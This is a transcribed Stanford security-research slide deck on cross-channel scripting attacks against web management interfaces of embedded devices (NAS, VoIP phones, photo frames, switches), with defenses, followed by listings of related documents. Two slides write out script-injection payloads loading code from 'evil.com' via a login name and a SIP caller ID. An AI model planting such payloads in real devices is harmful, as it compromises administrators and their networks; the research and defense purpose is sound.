Stanford Computer Security Lab XCS. Cross Channel Scripting. Hristo Bojinov Elie Bursztein Dan Boneh Stanford Computer Security Lab

Size: px
Start display at page:

Download "Stanford Computer Security Lab XCS. Cross Channel Scripting. Hristo Bojinov Elie Bursztein Dan Boneh Stanford Computer Security Lab"

Transcription

1 Stanford Computer Security Lab XCS Cross Channel Scripting Hristo Bojinov Elie Bursztein Dan Boneh Stanford Computer Security Lab

2 What this talk is about? XCS (our new attack) Massively deployed devices Embedded web management interface How you can exploit XCS What we can do about it Why it is hard

3 devices?

4 Web management interface Managing embedded devices via a web interface: Easier for users Cheaper for vendors

5 Internet 240M registered domains 72M active domains Source Netcraft

6 Web security prominence Today: top server-side issue top client-side issue % Source: Sans top 20 Hristo Bojinov Elie Bursztein Dan Boneh Source: MITRE CVE trends Embedded Management Interfaces Emerging Massive Insecurity

7 Web application spectrum # users Popular Internet web sites Custom web applications devices? Consumer electronics Network infrastructure Security research # of sites

8 Embedded device prominence Embedded web applications are everywhere 100M+ WiFi access points also in millions of switches, printers, consumer electronics San Francisco WiFi access points Source: skyhookwireless

9 Embedded web servers will soon dominate 300 Growth Internet Embedded (NAS and photo frame only) 225 (Millions) Data : - Parks associates - Netcraft

10 Spectrum revisited # users Popular web applications devices Custom web applications Security research # of sites

11 Recipe for a disaster Vendors build their own web applications Standard web server (sometimes) Custom web application stack Weak web security New features/services added at a fast pace Vendors compete on number of services in product Interactions between services vulnerabilities

12 Some vendors got it right... Kodak 1

13 ... almost.

14 The result Vulnerabilities in every device we audited

15 Outline Audit methodology: auditing a zoo of devices Illustrative attacks XCS affect a wide range of things Defenses and lessons learned Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

16 Stanford Computer Security Lab Methodology

17 Audit methodology Brands Vulnerability types Device types

18 Overall audit results 8 categories of devices 16 different brands 23 devices 50+ vulnerabilities reported to CERT Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

19 Attack types Popular ones: Cross Site Scripting (XSS) Cross Site Request Forgeries (CSRF) Cross-Channel Scripting (XCS) attacks File security User authentication

20 Stored Cross Site Scripting (XSS) illustrated D-link DNS-323 Allows to share files Configured via Web

21 Stored XSS illustrated Web Form file system Web App NAS Fill a http form <script>..</script> reflect into the page: <script>..</script> Attacker

22 Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

23 Cross Site Request Forgery (CSRF) illustrated Netgear FS750T2 Intelligent switch Configured via Web

24 CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web 3 Trigger POST (e.g. via Ads) Internet

25 Cross Channel Scripting (XCS) illustrated LaCie Ethernet disk mini Share access control Web interface Public FTP

26 XCS illustrated FTP server file system Web App NAS upload the file: <script>..</script>.pdf reflect the filename: <script>..</script>.pdf Attacker Admin Browser

27 Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

28 XCS: cross-channel scripting Alternate Channels Web attacker Device User Injection Storage Reflection

29 Devices as stepping stones 2 Browse internet 6 Send malicious payload 1 Administer 4 infect 5 the access device files Internet 3 Trigger POST (e.g. via Ads) 7 Attack local network

30 Brands

31 Devices Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

32 Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 framde NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability

33 4.2 List of Devices by Brand Devices by Brand Table 2 lists which types of devices were tested for each brand. As one can see we did test devices from vendors specialized in one type of product such as Buffalo, and from vendors that have a wide range of products such as D-link. Brand Camera LOM NAS Phone Photo Frame Printer Router Switch Allied Buffalo D-Link Dell estarling HP IBM Intel Kodak LaCie Linksys Netgear Panasonic QNAP Samsung SMC TrendNet Table 2: List of devices by brand Allied Telesis: Formerly Allied Telesync, is a telecommunications company specialized in

34 Attack surface Confidentiality Integrity Availability Access control Attribution

35 Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access control 23 Access files without password Attribution 22 Don t log access

36 Stanford Computer Security Lab Illustrative Attacks

37 Login+Log XSS Quick warm-up: LOM LOM basics Log XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

38 Login+Log XSS LOM basics Lights-out recovery, maintenance, inventory tracking PCI card and chipset varieties available Separate NIC and admin login* Low-security default settings Motherboard connection Usually invisible to OS

39 Login+Log XSS Log XSS Known for a decade Traditionally injected via DNS Also see recent IBM BladeCenter advisory

40 Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog 3 Payload executes Internet

41 Login+Log XSS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

42 Cross Channel Scripting (XCS) Moving on to real XCS VoIP phone Photo frame Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

43 SIP XCS VoIP phone Linksys SPA942 Web interface SIP support Call logs

44 SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain Internet 2 RTP: carries actual binary data

45 SIP XCS 1 Attacker makes a call as <script src="//evil.com/"></script> 2 Administrator accesses web interface Internet 3 Payload executes

46 SIP XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

47 Photo frame sales

48 Photo frame XCS WiFi photo frame Samsung SPF85V RSS / URL feed Windows Live WMV / AVI

49 Photo frame XCS Fetch photos from the Internet. Watch movies too. Operation Use browser interface to set up You can also see the current photo! Many configuration fields: RSS, URLs, etc...

50 Photo frame XCS 1 Attacker infects via CSRF 2 User connects to manage 3 Payload executes Internet

51 Photo frame XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

52 Photo frames as stepping stones 2 Son connects to upload photos Internet 3 Intranet infected 1 Frame gets infected via grandma s browser

53 Photo frame XCS Bonus feature : Current photo visible without login

54 A vehicle for scams? estarling photo frame receive photos via predictable address Frame error! Call us

55 Stanford Computer Security Lab XCS reloaded API based XCS

56 Restful API Many popular web services share data via RESTful API such as Twitter, Facebook, Myspace... REST stand for Representational State Transfert It is designed to work over HTTP

57 REST API advantage Client-server Stateless Cacheable Uniform interface Return data in various format : XML, JSON...

58 Twitpic use Twitter API

59 Mafia Wars on facebook plateform

60 Where XCS arise? Consumer trust producer Each producer has it own filtering policy Each consumer has it own filtering policy The filerting applied is not explicitly defined

61 Example

62 Stanford Computer Security Lab XCS revolution Phone based XCS

63 Modern smartphone Modern smartphone extensively use HTML view

64 Example WebOS 1.04 was vulnerable to XCS attack The payload was injected via a calendar Reflected to the calendar application

65 Stanford Computer Security Lab Defenses

66 Defense approaches Today Internal audits by IT staff and end-users Near-term SiteFirewall: IT, browser vendors Long-term Server-side security gains

67 SiteFirewall Injected script can issue requests at will: <script src= > Before

68 SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

69 SiteFirewall Page interactions with the Internet blocked. After

70 Server-side defenses Difficulties No standard platform to build for Adding insecure features: unavoidable Requirements Security is a top priority Performance trade-offs possible Architectural trade-offs: OS vs. Framework

71 Server-side defenses OS level Use captchas Process sandboxing Control flow Data storage and access model Framework Secure embedded web applications RoR too heavyweight in this context

72 Static analysis Analyze if combining two give filtering policy is secure On going work

73 Stanford Computer Security Lab One more thing

74 Another boring NAS device? SOHO NAS Buffalo LS-CHL BitTorrent support!

75 Massive exploitation takeover Create a bad torrent takeover Internet Famous_movie.torrent

76 Peer-to-peer XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

77 Conclusion Sticky technology Standardize... remote access firmware upgrade rendering to HTML configuration backup Thanks to Eric Lovett and Parks Associates!

78 Stanford Computer Security Lab Questions?

79 Configuration file XCS WiFi router Linksys WRT54G2 Standard features Config backup Mature technology...

80 Configuration file XCS Save file Restore file Configuration file Tampering with the file

81 Configuration file XCS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

82 An easy fix Sign with a device private key!

83 What about arbitrary file inclusion? Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity

84 More attacks: Switches Netgear switch Trendnet switch

85 More attacks: LOM IBM RSA II Intel vpro/amt

State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell

State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell Stanford Computer Security Lab State of The Art: Automated Black Box Web Application Vulnerability Testing, Elie Bursztein, Divij Gupta, John Mitchell Background Web Application Vulnerability Protection

More information

Adobe Systems Incorporated

Adobe Systems Incorporated Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...

More information

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most

More information

Where every interaction matters.

Where every interaction matters. Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper

More information

Insecurity breeds at home

Insecurity breeds at home Insecurity breeds at home - Vulnerabilities in SOHO routers Amrita Center for Cyber Security Amrita University Small Office Home Office(SOHO) Routers 2 Problem at hand No technology available to detect/prevent

More information

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications

More information

APNT#1184 WAN or Internet Access to GP-Pro EX. Introduction

APNT#1184 WAN or Internet Access to GP-Pro EX. Introduction Application Note #1184: WAN or Internet Access to GP-Pro EX Introduction This Application Note is intended to assist users in using GP-Pro EX features over a wide area network (WAN) or Internet connection.

More information

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory

More information

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not

More information

Gateway Apps - Security Summary SECURITY SUMMARY

Gateway Apps - Security Summary SECURITY SUMMARY Gateway Apps - Security Summary SECURITY SUMMARY 27/02/2015 Document Status Title Harmony Security summary Author(s) Yabing Li Version V1.0 Status draft Change Record Date Author Version Change reference

More information

Penetration Test Report

Penetration Test Report Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System

More information

WEB 2.0 AND SECURITY

WEB 2.0 AND SECURITY WEB 2.0 AND SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without

More information

Thomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch

Thomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch Thomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch What

More information

IBM. Vulnerability scanning and best practices

IBM. Vulnerability scanning and best practices IBM Vulnerability scanning and best practices ii Vulnerability scanning and best practices Contents Vulnerability scanning strategy and best practices.............. 1 Scan types............... 2 Scan duration

More information

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis

More information

Essential IT Security Testing

Essential IT Security Testing Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04

More information

Table of Contents. Introduction. Audience. At Course Completion

Table of Contents. Introduction. Audience. At Course Completion Table of Contents Introduction Audience At Course Completion Prerequisites Microsoft Certified Professional Exams Student Materials Course Outline Introduction This three-day instructor-led course provides

More information

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance

More information

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft Finding and Preventing Cross- Site Request Forgery Tom Gallagher Security Test Lead, Microsoft Agenda Quick reminder of how HTML forms work How cross-site request forgery (CSRF) attack works Obstacles

More information

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development

More information

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications 1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won

More information

Securing your Linksys WRT54G

Securing your Linksys WRT54G Securing your Linksys WRT54G Abstract Current implementations of the 802.11b and 802.11g wireless LAN standards have several potential pitfalls for security. However, built in security mechanisms in these

More information

(WAPT) Web Application Penetration Testing

(WAPT) Web Application Penetration Testing (WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:

More information

Secure Programming Lecture 12: Web Application Security III

Secure Programming Lecture 12: Web Application Security III Secure Programming Lecture 12: Web Application Security III David Aspinall 6th March 2014 Outline Overview Recent failures More on authorization Redirects Sensitive data Cross-site Request Forgery (CSRF)

More information

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus

ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered

More information

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription

More information

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition Advanced Administration for Citrix NetScaler 9.0 Platinum Edition Course Length: 5 Days Course Code: CNS-300 Course Description This course provides the foundation to manage, configure and monitor advanced

More information

Web Application Vulnerability Testing with Nessus

Web Application Vulnerability Testing with Nessus The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information

More information

DRO-210i LOAD BALANCING ROUTER. Review Package Contents

DRO-210i LOAD BALANCING ROUTER. Review Package Contents DRO-210i LOAD BALANCING ROUTER Review Package Contents Make sure that the package contains the following items. DRO-210i Load Balancing Router 2 Straight Ethernet Cables 1 Cross Over Ethernet Cable 1 Power

More information

Web-Application Security

Web-Application Security Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice

More information

Basic & Advanced Administration for Citrix NetScaler 9.2

Basic & Advanced Administration for Citrix NetScaler 9.2 Basic & Advanced Administration for Citrix NetScaler 9.2 Day One Introducing and deploying Citrix NetScaler Key - Brief Introduction to the NetScaler system Planning a NetScaler deployment Deployment scenarios

More information

How To Protect Your Computer From Being Hacked By A Hacker (For A Fee)

How To Protect Your Computer From Being Hacked By A Hacker (For A Fee) Illuminating the Security Issues with Lights-Out Server Management Anthony J. Bonkoski J. Alex Halderman University of Michigan What is IPMI? Need to manage a massive cluster of servers? OS installs, monitoring,

More information

Annex B - Content Management System (CMS) Qualifying Procedure

Annex B - Content Management System (CMS) Qualifying Procedure Page 1 DEPARTMENT OF Version: 1.5 Effective: December 18, 2014 Annex B - Content Management System (CMS) Qualifying Procedure This document is an annex to the Government Web Hosting Service (GWHS) Memorandum

More information

Web Application Security

Web Application Security Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching

More information

Cloud Security:Threats & Mitgations

Cloud Security:Threats & Mitgations Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer

More information

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group

Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Agenda Security Landscape Vulnerability Analysis Automated Vulnerability

More information

Attack Vector Detail Report Atlassian

Attack Vector Detail Report Atlassian Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability

More information

How to publish your NAS on the internet ThecusOS 6

How to publish your NAS on the internet ThecusOS 6 How to publish your NAS on the internet ThecusOS 6 2013/11 Contents Overview...3 Before you start...3 Checking your network environment....3 Making your Thecus NAS accessible via the Internet...4 Step

More information

Dual Bay Home Media Store. User Manual

Dual Bay Home Media Store. User Manual Dual Bay Home Media Store User Manual CH3HNAS2 V1.0 CONTENTS Chapter 1: Home Page... 3 Setup Wizard... 3 Settings... 3 User Management... 3 Download Station... 3 Online User Manual... 3 Support... 3 Chapter

More information

OWASP Top Ten Tools and Tactics

OWASP Top Ten Tools and Tactics OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),

More information

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction

More information

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security

More information

BYOD: End-to-End Security

BYOD: End-to-End Security BYOD: End-to-End Security Alen Lo MBA(CUHK), BSc(HKU), CISA, CCP, CISSP, CISM, CEH IRCA Certified ISMS Lead Auditor, itsmf ISO 20000 Auditor Principal Consultant i-totalsecurity Consulting Limited alenlo@n2nsecurity.com

More information

Security Vulnerabilities in SOHO Routers Craig Heffner, Derek Yap www.sourcesec.com

Security Vulnerabilities in SOHO Routers Craig Heffner, Derek Yap www.sourcesec.com Security Vulnerabilities in SOHO Routers Craig Heffner, Derek Yap www.sourcesec.com Introduction With embedded devices permeating today's home networks, they have begun to attract a higher level of scrutiny

More information

Check list for web developers

Check list for web developers Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation

More information

Setup and Configuration Setup Assistant Migration Assistant System Preferences Configuration Profiles System Information

Setup and Configuration Setup Assistant Migration Assistant System Preferences Configuration Profiles System Information Yosemite 101+201: Apple Certified Technical Coordinator v10.10 Bootcamp (5 Days) Install OS X Yosemite About OS X Yosemite Installation Choices Before Upgrading a Previous System Preparing the System Disk

More information

NMS300 Network Management System

NMS300 Network Management System NMS300 Network Management System User Manual June 2013 202-11289-01 350 East Plumeria Drive San Jose, CA 95134 USA Support Thank you for purchasing this NETGEAR product. After installing your device, locate

More information

Project 2: Web Security Pitfalls

Project 2: Web Security Pitfalls EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course

More information

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.

More information

Chapter 4 Managing Your Network

Chapter 4 Managing Your Network Chapter 4 Managing Your Network This chapter describes how to perform network management tasks with your ADSL2+ Modem Wireless Router. Backing Up, Restoring, or Erasing Your Settings The configuration

More information

Workday Mobile Security FAQ

Workday Mobile Security FAQ Workday Mobile Security FAQ Workday Mobile Security FAQ Contents The Workday Approach 2 Authentication 3 Session 3 Mobile Device Management (MDM) 3 Workday Applications 4 Web 4 Transport Security 5 Privacy

More information

How to Hack Millions of Routers. Craig Heffner, Seismic LLC

How to Hack Millions of Routers. Craig Heffner, Seismic LLC How to Hack Millions of Routers Craig Heffner, Seismic LLC SOHO Router Security? Common Attack Techniques Cross Site Request Forgery No trust relationship between browser and router Can t forge Basic Authentication

More information

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real

More information

FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that

More information

Chapter 4 Management. Viewing the Activity Log

Chapter 4 Management. Viewing the Activity Log Chapter 4 Management This chapter describes how to use the management features of your NETGEAR WG102 ProSafe 802.11g Wireless Access Point. To get to these features, connect to the WG102 as described in

More information

Chapter 3 Management. Remote Management

Chapter 3 Management. Remote Management Chapter 3 Management This chapter describes how to use the management features of your ProSafe 802.11a/g Dual Band Wireless Access Point WAG102. To access these features, connect to the WAG102 as described

More information

QuickBooks Online: Security & Infrastructure

QuickBooks Online: Security & Infrastructure QuickBooks Online: Security & Infrastructure May 2014 Contents Introduction: QuickBooks Online Security and Infrastructure... 3 Security of Your Data... 3 Access Control... 3 Privacy... 4 Availability...

More information

Web application security

Web application security Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0

More information

What Does DNSChanger Do to My Computer? Am I Infected?

What Does DNSChanger Do to My Computer? Am I Infected? DNSChanger Malware DNS (Domain Name System) is an Internet service that converts user-friendly domain names into the numerical Internet protocol (IP) addresses that computers use to talk to each other.

More information

Still Aren't Doing. Frank Kim

Still Aren't Doing. Frank Kim Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding

More information

Lecture 1. Lecture Overview. Intro to Networking. Intro to Networking. Motivation behind Networking. Computer / Data Networks

Lecture 1. Lecture Overview. Intro to Networking. Intro to Networking. Motivation behind Networking. Computer / Data Networks Lecture 1 An Introduction to Networking Chapter 1, pages 1-22 Dave Novak BSAD 146, Introduction to Networking School of Business Administration University of Vermont Lecture Overview Brief introduction

More information

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration

More information

JBoss security: penetration, protection and patching. David Jorm djorm@redhat.com

JBoss security: penetration, protection and patching. David Jorm djorm@redhat.com JBoss security: penetration, protection and patching David Jorm djorm@redhat.com Contents The problem Background Historical vulnerabilities JBoss worm Security response for products The solution The Problem

More information

The weakest link on the network: exploiting ADSL routers to perform cyber-attacks

The weakest link on the network: exploiting ADSL routers to perform cyber-attacks The weakest link on the network: exploiting ADSL routers to perform cyber-attacks Anastasios Stasinopoulos, Christoforos Ntantogian, Christos Xenakis Department of Digital Systems, University of Piraeus

More information

Web Application Attacks and Countermeasures: Case Studies from Financial Systems

Web Application Attacks and Countermeasures: Case Studies from Financial Systems Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications

More information

Hardening Guide. Installation Guide

Hardening Guide. Installation Guide Installation Guide About this Document The intended use of this guide is to harden devices and also provide collateral for deployment teams to deal with local network policy, configurations and specification.

More information

IBM Security QRadar Vulnerability Manager Version 7.2.6. User Guide IBM

IBM Security QRadar Vulnerability Manager Version 7.2.6. User Guide IBM IBM Security QRadar Vulnerability Manager Version 7.2.6 User Guide IBM Note Before using this information and the product that it supports, read the information in Notices on page 91. Product information

More information

SOHO WIRELESS ROUTER (IN)SECURITY TRIPWIRE VULNERABILITY AND EXPOSURE RESEARCH TEAM (VERT) REPORT

SOHO WIRELESS ROUTER (IN)SECURITY TRIPWIRE VULNERABILITY AND EXPOSURE RESEARCH TEAM (VERT) REPORT CONFIDENCE: SECURED WHITE PAPER SOHO WIRELESS ROUTER (IN)SECURITY TRIPWIRE VULNERABILITY AND EXPOSURE RESEARCH TEAM (VERT) REPORT ADVANCED THREAT PROTECTION, SECURITY AND COMPLIANCE EXECUTIVE SUMMARY Home

More information

Note: these functions are available if service provider supports them.

Note: these functions are available if service provider supports them. Key Feature New Feature Remote Maintenance: phone can be diagnosed and configured by remote. Zero Config: automated provisioning and software upgrading even through firewall/nat. Centralized Management:

More information

Virtualization System Security

Virtualization System Security Virtualization System Security Bryan Williams, IBM X-Force Advanced Research Tom Cross, Manager, IBM X-Force Security Strategy 2009 IBM Corporation Overview Vulnerability disclosure analysis Vulnerability

More information

WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services

WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services WEB SITE SECURITY Jeff Aliber Verizon Digital Media Services 1 SECURITY & THE CLOUD The Cloud (Web) o The Cloud is becoming the de-facto way for enterprises to leverage common infrastructure while innovating

More information

Small Business Server Part 2

Small Business Server Part 2 Small Business Server Part 2 Presented by : Robert Crane BE MBA MCP director@ciaops.com Computer Information Agency http://www.ciaops.com Agenda Week 1 What is SBS / Setup Week 2 Using & configuring SBS

More information

Half Bridge mode }These options are all found under Misc Configuration

Half Bridge mode }These options are all found under Misc Configuration Securing Your NB1300 - Once connected. There are eleven areas that need your attention to secure your NB1300 from unauthorised access - these areas or features are; Physical Security Admin Password User

More information

What is Web Security? Motivation

What is Web Security? Motivation brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web

More information

